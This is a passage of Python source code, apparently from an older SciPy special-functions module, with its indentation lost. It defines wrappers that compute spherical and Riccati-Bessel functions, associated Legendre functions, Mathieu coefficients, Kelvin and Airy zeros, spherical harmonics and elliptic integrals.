n1 = n
if iscomplex(z):
nm,In,Inp,kn,knp = specfun.csphik(n1,z)
else:
nm,In,Inp = specfun.sphi(n1,z)
return In[:(n+1)], Inp[:(n+1)]
def sph_kn(n,z):
"""Compute the spherical Bessel function kn(z) and its derivative for
all orders up to and including n.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
n1 = n
if iscomplex(z) or less(z,0):
nm,In,Inp,kn,knp = specfun.csphik(n1,z)
else:
nm,kn,knp = specfun.sphk(n1,z)
return kn[:(n+1)], knp[:(n+1)]
def sph_inkn(n,z):
"""Compute the spherical Bessel functions, in(z) and kn(z) and their
derivatives for all orders up to and including n.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if iscomplex(z) or less(z,0):
nm,In,Inp,kn,knp = specfun.csphik(n,z)
else:
nm,In,Inp = specfun.sphi(n,z)
nm,kn,knp = specfun.sphk(n,z)
return In,Inp,kn,knp
def riccati_jn(n,x):
"""Compute the Ricatti-Bessel function of the first kind and its
derivative for all orders up to and including n.
"""
if not (isscalar(n) and isscalar(x)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n == 0):
n1 = 1
else:
n1 = n
nm,jn,jnp = specfun.rctj(n1,x)
return jn[:(n+1)],jnp[:(n+1)]
def riccati_yn(n,x):
"""Compute the Ricatti-Bessel function of the second kind and its
derivative for all orders up to and including n.
"""
if not (isscalar(n) and isscalar(x)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n == 0):
n1 = 1
else:
n1 = n
nm,jn,jnp = specfun.rcty(n1,x)
return jn[:(n+1)],jnp[:(n+1)]
def _sph_harmonic(m,n,theta,phi):
"""Compute spherical harmonics.
This is a ufunc and may take scalar or array arguments like any
other ufunc. The inputs will be broadcasted against each other.
Parameters
----------
m : int
|m| <= n; the order of the harmonic.
n : int
where `n` >= 0; the degree of the harmonic. This is often called
``l`` (lower case L) in descriptions of spherical harmonics.
theta : float
[0, 2*pi]; the azimuthal (longitudinal) coordinate.
phi : float
[0, pi]; the polar (colatitudinal) coordinate.
Returns
-------
y_mn : complex float
The harmonic $Y^m_n$ sampled at `theta` and `phi`
Notes
-----
There are different conventions for the meaning of input arguments
`theta` and `phi`. We take `theta` to be the azimuthal angle and
`phi` to be the polar angle. It is common to see the opposite
convention - that is `theta` as the polar angle and `phi` as the
azimuthal angle.
"""
x = cos(phi)
m,n = int(m), int(n)
Pmn,Pmn_deriv = lpmn(m,n,x)
# Legendre call generates all orders up to m and degrees up to n
val = Pmn[-1, -1]
val *= sqrt((2*n+1)/4.0/pi)
val *= exp(0.5*(gammaln(n-m+1)-gammaln(n+m+1)))
val *= exp(1j*m*theta)
return val
sph_harm = vectorize(_sph_harmonic,'D')
def erfinv(y):
return ndtri((y+1)/2.0)/sqrt(2)
def erfcinv(y):
return ndtri((2-y)/2.0)/sqrt(2)
def erf_zeros(nt):
"""Compute nt complex zeros of the error function erf(z).
"""
if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
raise ValueError("Argument must be positive scalar integer.")
return specfun.cerzo(nt)
def fresnelc_zeros(nt):
"""Compute nt complex zeros of the cosine Fresnel integral C(z).
"""
if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
raise ValueError("Argument must be positive scalar integer.")
return specfun.fcszo(1,nt)
def fresnels_zeros(nt):
"""Compute nt complex zeros of the sine Fresnel integral S(z).
"""
if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
raise ValueError("Argument must be positive scalar integer.")
return specfun.fcszo(2,nt)
def fresnel_zeros(nt):
"""Compute nt complex zeros of the sine and cosine Fresnel integrals
S(z) and C(z).
"""
if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
raise ValueError("Argument must be positive scalar integer.")
return specfun.fcszo(2,nt), specfun.fcszo(1,nt)
def hyp0f1(v, z):
r"""Confluent hypergeometric limit function 0F1.
Parameters
----------
v, z : array_like
Input values.
Returns
-------
hyp0f1 : ndarray
The confluent hypergeometric limit function.
Notes
-----
This function is defined as:
.. math:: _0F_1(v,z) = \sum_{k=0}^{\inf}\frac{z^k}{(v)_k k!}.
It's also the limit as q -> infinity of ``1F1(q;v;z/q)``, and satisfies
the differential equation :math:``f''(z) + vf'(z) = f(z)`.
"""
v = atleast_1d(v)
z = atleast_1d(z)
v, z = np.broadcast_arrays(v, z)
arg = 2 * sqrt(abs(z))
old_err = np.seterr(all='ignore') # for z=0, a<1 and num=inf, next lines
num = where(z.real >= 0, iv(v - 1, arg), jv(v - 1, arg))
den = abs(z)**((v - 1.0) / 2)
num *= gamma(v)
np.seterr(**old_err)
num[z == 0] = 1
den[z == 0] = 1
return num / den
def assoc_laguerre(x,n,k=0.0):
return orthogonal.eval_genlaguerre(n, k, x)
digamma = psi
def polygamma(n, x):
"""Polygamma function which is the nth derivative of the digamma (psi)
function.
Parameters
----------
n : array_like of int
The order of the derivative of `psi`.
x : array_like
Where to evaluate the polygamma function.
Returns
-------
polygamma : ndarray
The result.
Examples
--------
>>> from scipy import special
>>> x = [2, 3, 25.5]
>>> special.polygamma(1, x)
array([ 0.64493407, 0.39493407, 0.03999467])
>>> special.polygamma(0, x) == special.psi(x)
array([ True, True, True], dtype=bool)
"""
n, x = asarray(n), asarray(x)
fac2 = (-1.0)**(n+1) * gamma(n+1.0) * zeta(n+1,x)
return where(n == 0, psi(x), fac2)
def mathieu_even_coef(m,q):
"""Compute expansion coefficients for even Mathieu functions and
modified Mathieu functions.
"""
if not (isscalar(m) and isscalar(q)):
raise ValueError("m and q must be scalars.")
if (q < 0):
raise ValueError("q >=0")
if (m != floor(m)) or (m < 0):
raise ValueError("m must be an integer >=0.")
if (q <= 1):
qm = 7.5+56.1*sqrt(q)-134.7*q+90.7*sqrt(q)*q
else:
qm = 17.0+3.1*sqrt(q)-.126*q+.0037*sqrt(q)*q
km = int(qm+0.5*m)
if km > 251:
print("Warning, too many predicted coefficients.")
kd = 1
m = int(floor(m))
if m % 2:
kd = 2
a = mathieu_a(m,q)
fc = specfun.fcoef(kd,m,q,a)
return fc[:km]
def mathieu_odd_coef(m,q):
"""Compute expansion coefficients for even Mathieu functions and
modified Mathieu functions.
"""
if not (isscalar(m) and isscalar(q)):
raise ValueError("m and q must be scalars.")
if (q < 0):
raise ValueError("q >=0")
if (m != floor(m)) or (m <= 0):
raise ValueError("m must be an integer > 0")
if (q <= 1):
qm = 7.5+56.1*sqrt(q)-134.7*q+90.7*sqrt(q)*q
else:
qm = 17.0+3.1*sqrt(q)-.126*q+.0037*sqrt(q)*q
km = int(qm+0.5*m)
if km > 251:
print("Warning, too many predicted coefficients.")
kd = 4
m = int(floor(m))
if m % 2:
kd = 3
b = mathieu_b(m,q)
fc = specfun.fcoef(kd,m,q,b)
return fc[:km]
def lpmn(m,n,z):
"""Associated Legendre function of the first kind, Pmn(z)
Computes the associated Legendre function of the first kind
of order m and degree n,::
Pmn(z) = P_n^m(z)
and its derivative, ``Pmn'(z)``. Returns two arrays of size
``(m+1, n+1)`` containing ``Pmn(z)`` and ``Pmn'(z)`` for all
orders from ``0..m`` and degrees from ``0..n``.
This function takes a real argument ``z``. For complex arguments ``z``
use clpmn instead.
Parameters
----------
m : int
``|m| <= n``; the order of the Legendre function.
n : int
where ``n >= 0``; the degree of the Legendre function. Often
called ``l`` (lower case L) in descriptions of the associated
Legendre function
z : float
Input value.
Returns
-------
Pmn_z : (m+1, n+1) array
Values for all orders 0..m and degrees 0..n
Pmn_d_z : (m+1, n+1) array
Derivatives for all orders 0..m and degrees 0..n
See Also
--------
clpmn: associated Legendre functions of the first kind for complex z
Notes
-----
In the interval (-1, 1), Ferrer's function of the first kind is
returned. The phase convention used for the intervals (1, inf)
and (-inf, -1) is such that the result is always real.
References
----------
.. [1] NIST Digital Library of Mathematical Functions
http://dlmf.nist.gov/14.3
"""
if not isscalar(m) or (abs(m) > n):
raise ValueError("m must be <= n.")
if not isscalar(n) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if not isscalar(z):
raise ValueError("z must be scalar.")
if iscomplex(z):
raise ValueError("Argument must be real. Use clpmn instead.")
if (m < 0):
mp = -m
mf,nf = mgrid[0:mp+1,0:n+1]
sv = errprint(0)
if abs(z) < 1:
# Ferrer function; DLMF 14.9.3
fixarr = where(mf > nf,0.0,(-1)**mf * gamma(nf-mf+1) / gamma(nf+mf+1))
else:
# Match to clpmn; DLMF 14.9.13
fixarr = where(mf > nf,0.0, gamma(nf-mf+1) / gamma(nf+mf+1))
sv = errprint(sv)
else:
mp = m
p,pd = specfun.lpmn(mp,n,z)
if (m < 0):
p = p * fixarr
pd = pd * fixarr
return p,pd
def clpmn(m,n,z):
"""Associated Legendre function of the first kind, Pmn(z)
Computes the (associated) Legendre function of the first kind
of order m and degree n,::
Pmn(z) = P_n^m(z)
and its derivative, ``Pmn'(z)``. Returns two arrays of size
``(m+1, n+1)`` containing ``Pmn(z)`` and ``Pmn'(z)`` for all
orders from ``0..m`` and degrees from ``0..n``.
Parameters
----------
m : int
``|m| <= n``; the order of the Legendre function.
n : int
where ``n >= 0``; the degree of the Legendre function. Often
called ``l`` (lower case L) in descriptions of the associated
Legendre function
z : float or complex
Input value.
Returns
-------
Pmn_z : (m+1, n+1) array
Values for all orders 0..m and degrees 0..n
Pmn_d_z : (m+1, n+1) array
Derivatives for all orders 0..m and degrees 0..n
See Also
--------
lpmn: associated Legendre functions of the first kind for real z
Notes
-----
Phase conventions are chosen according to [1] such that the
function is analytic. The cut lies on the interval (-1, 1).
Approaching the cut from above or below in general yields a phase
factor with respect to Ferrer's function of the first kind
(cf. `lpmn`).
References
----------
.. [1] NIST Digital Library of Mathematical Functions
http://dlmf.nist.gov/14.21
"""
if not isscalar(m) or (abs(m) > n):
raise ValueError("m must be <= n.")
if not isscalar(n) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if not isscalar(z):
raise ValueError("z must be scalar.")
if (m < 0):
mp = -m
mf,nf = mgrid[0:mp+1,0:n+1]
sv = errprint(0)
fixarr = where(mf > nf,0.0,gamma(nf-mf+1) / gamma(nf+mf+1))
sv = errprint(sv)
else:
mp = m
p,pd = specfun.clpmn(mp,n,real(z),imag(z))
if (m < 0):
p = p * fixarr
pd = pd * fixarr
return p,pd
def lqmn(m,n,z):
"""Associated Legendre functions of the second kind, Qmn(z) and its
derivative, ``Qmn'(z)`` of order m and degree n. Returns two
arrays of size ``(m+1, n+1)`` containing ``Qmn(z)`` and ``Qmn'(z)`` for
all orders from ``0..m`` and degrees from ``0..n``.
z can be complex.
"""
if not isscalar(m) or (m < 0):
raise ValueError("m must be a non-negative integer.")
if not isscalar(n) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if not isscalar(z):
raise ValueError("z must be scalar.")
m = int(m)
n = int(n)
# Ensure neither m nor n == 0
mm = max(1,m)
nn = max(1,n)
if iscomplex(z):
q,qd = specfun.clqmn(mm,nn,z)
else:
q,qd = specfun.lqmn(mm,nn,z)
return q[:(m+1),:(n+1)],qd[:(m+1),:(n+1)]
def bernoulli(n):
"""Return an array of the Bernoulli numbers B0..Bn
"""
if not isscalar(n) or (n < 0):
raise ValueError("n must be a non-negative integer.")
n = int(n)
if (n < 2):
n1 = 2
else:
n1 = n
return specfun.bernob(int(n1))[:(n+1)]
def euler(n):
"""Return an array of the Euler numbers E0..En (inclusive)
"""
if not isscalar(n) or (n < 0):
raise ValueError("n must be a non-negative integer.")
n = int(n)
if (n < 2):
n1 = 2
else:
n1 = n
return specfun.eulerb(n1)[:(n+1)]
def lpn(n,z):
"""Compute sequence of Legendre functions of the first kind (polynomials),
Pn(z) and derivatives for all degrees from 0 to n (inclusive).
See also special.legendre for polynomial class.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
n1 = n
if iscomplex(z):
pn,pd = specfun.clpn(n1,z)
else:
pn,pd = specfun.lpn(n1,z)
return pn[:(n+1)],pd[:(n+1)]
## lpni
def lqn(n,z):
"""Compute sequence of Legendre functions of the second kind,
Qn(z) and derivatives for all degrees from 0 to n (inclusive).
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
n1 = n
if iscomplex(z):
qn,qd = specfun.clqn(n1,z)
else:
qn,qd = specfun.lqnb(n1,z)
return qn[:(n+1)],qd[:(n+1)]
def ai_zeros(nt):
"""Compute the zeros of Airy Functions Ai(x) and Ai'(x), a and a'
respectively, and the associated values of Ai(a') and Ai'(a).
Returns
-------
a[l-1] -- the lth zero of Ai(x)
ap[l-1] -- the lth zero of Ai'(x)
ai[l-1] -- Ai(ap[l-1])
aip[l-1] -- Ai'(a[l-1])
"""
kf = 1
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be a positive integer scalar.")
return specfun.airyzo(nt,kf)
def bi_zeros(nt):
"""Compute the zeros of Airy Functions Bi(x) and Bi'(x), b and b'
respectively, and the associated values of Ai(b') and Ai'(b).
Returns
-------
b[l-1] -- the lth zero of Bi(x)
bp[l-1] -- the lth zero of Bi'(x)
bi[l-1] -- Bi(bp[l-1])
bip[l-1] -- Bi'(b[l-1])
"""
kf = 2
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be a positive integer scalar.")
return specfun.airyzo(nt,kf)
def lmbda(v,x):
"""Compute sequence of lambda functions with arbitrary order v
and their derivatives. Lv0(x)..Lv(x) are computed with v0=v-int(v).
"""
if not (isscalar(v) and isscalar(x)):
raise ValueError("arguments must be scalars.")
if (v < 0):
raise ValueError("argument must be > 0.")
n = int(v)
v0 = v - n
if (n < 1):
n1 = 1
else:
n1 = n
v1 = n1 + v0
if (v != floor(v)):
vm, vl, dl = specfun.lamv(v1,x)
else:
vm, vl, dl = specfun.lamn(v1,x)
return vl[:(n+1)], dl[:(n+1)]
def pbdv_seq(v,x):
"""Compute sequence of parabolic cylinder functions Dv(x) and
their derivatives for Dv0(x)..Dv(x) with v0=v-int(v).
"""
if not (isscalar(v) and isscalar(x)):
raise ValueError("arguments must be scalars.")
n = int(v)
v0 = v-n
if (n < 1):
n1 = 1
else:
n1 = n
v1 = n1 + v0
dv,dp,pdf,pdd = specfun.pbdv(v1,x)
return dv[:n1+1],dp[:n1+1]
def pbvv_seq(v,x):
"""Compute sequence of parabolic cylinder functions Dv(x) and
their derivatives for Dv0(x)..Dv(x) with v0=v-int(v).
"""
if not (isscalar(v) and isscalar(x)):
raise ValueError("arguments must be scalars.")
n = int(v)
v0 = v-n
if (n <= 1):
n1 = 1
else:
n1 = n
v1 = n1 + v0
dv,dp,pdf,pdd = specfun.pbvv(v1,x)
return dv[:n1+1],dp[:n1+1]
def pbdn_seq(n,z):
"""Compute sequence of parabolic cylinder functions Dn(z) and
their derivatives for D0(z)..Dn(z).
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (floor(n) != n):
raise ValueError("n must be an integer.")
if (abs(n) <= 1):
n1 = 1
else:
n1 = n
cpb,cpd = specfun.cpbdn(n1,z)
return cpb[:n1+1],cpd[:n1+1]
def ber_zeros(nt):
"""Compute nt zeros of the Kelvin function ber x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,1)
def bei_zeros(nt):
"""Compute nt zeros of the Kelvin function bei x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,2)
def ker_zeros(nt):
"""Compute nt zeros of the Kelvin function ker x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,3)
def kei_zeros(nt):
"""Compute nt zeros of the Kelvin function kei x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,4)
def berp_zeros(nt):
"""Compute nt zeros of the Kelvin function ber' x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,5)
def beip_zeros(nt):
"""Compute nt zeros of the Kelvin function bei' x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,6)
def kerp_zeros(nt):
"""Compute nt zeros of the Kelvin function ker' x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,7)
def keip_zeros(nt):
"""Compute nt zeros of the Kelvin function kei' x
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,8)
def kelvin_zeros(nt):
"""Compute nt zeros of all the Kelvin functions returned in a
length 8 tuple of arrays of length nt.
The tuple containse the arrays of zeros of
(ber, bei, ker, kei, ber', bei', ker', kei')
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("nt must be positive integer scalar.")
return specfun.klvnzo(nt,1), \
specfun.klvnzo(nt,2), \
specfun.klvnzo(nt,3), \
specfun.klvnzo(nt,4), \
specfun.klvnzo(nt,5), \
specfun.klvnzo(nt,6), \
specfun.klvnzo(nt,7), \
specfun.klvnzo(nt,8)
def pro_cv_seq(m,n,c):
"""Compute a sequence of characteristic values for the prolate
spheroidal wave functions for mode m and n'=m..n and spheroidal
parameter c.
"""
if not (isscalar(m) and isscalar(n) and isscalar(c)):
raise ValueError("Arguments must be scalars.")
if (n != floor(n)) or (m != floor(m)):
raise ValueError("Modes must be integers.")
if (n-m > 199):
raise ValueError("Difference between n and m is too large.")
maxL = n-m+1
return specfun.segv(m,n,c,1)[1][:maxL]
def obl_cv_seq(m,n,c):
"""Compute a sequence of characteristic values for the oblate
spheroidal wave functions for mode m and n'=m..n and spheroidal
parameter c.
"""
if not (isscalar(m) and isscalar(n) and isscalar(c)):
raise ValueError("Arguments must be scalars.")
if (n != floor(n)) or (m != floor(m)):
raise ValueError("Modes must be integers.")
if (n-m > 199):
raise ValueError("Difference between n and m is too large.")
maxL = n-m+1
return specfun.segv(m,n,c,-1)[1][:maxL]
def ellipk(m):
"""
Computes the complete elliptic integral of the first kind.
This function is defined as
.. math:: K(m) = \\int_0^{\\pi/2} [1 - m \\sin(t)^2]^{-1/2} dt
Parameters
----------
m : array_like
The parameter of the elliptic integral.
Returns
-------
K : array_like
Value of the elliptic integral.
Notes
-----
For more precision around point m = 1, use `ellipkm1`.
"""
return ellipkm1(1 - asarray(m))
def agm(a,b):
"""Arithmetic, Geometric Mean
Start with a_0=a and b_0=b and iteratively compute
a_{n+1} = (a_n+b_n)/2
b_{n+1} = sqrt(a_n*b_n)
until a_n=b_n. The result is agm(a,b)
agm(a,b)=agm(b,a)
agm(a,a) = a
min(a,b) < agm(a,b) < max(a,b)
"""
s = a + b + 0.0
return (pi / 4) * s / ellipkm1(4 * a * b / s ** 2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.